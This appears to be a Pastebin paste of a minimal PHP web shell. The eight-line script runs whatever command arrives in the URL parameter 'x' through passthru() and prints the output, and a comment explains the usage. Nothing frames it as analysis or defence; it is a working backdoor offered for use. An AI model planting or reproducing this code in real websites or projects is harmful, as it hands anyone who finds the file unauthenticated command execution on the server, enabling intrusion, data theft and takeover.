Advertisement
Guest User

Untitled

a guest
Jun 22nd, 2017
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.15 KB | None | 0 0
  1. <?php
  2. // Use: example.php?x=Command goes here
  3. // Function passthru may be disabled(!)
  4. if (isset($_GET['x']))
  5. {
  6.     echo passthru($_GET['x']);
  7. }
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement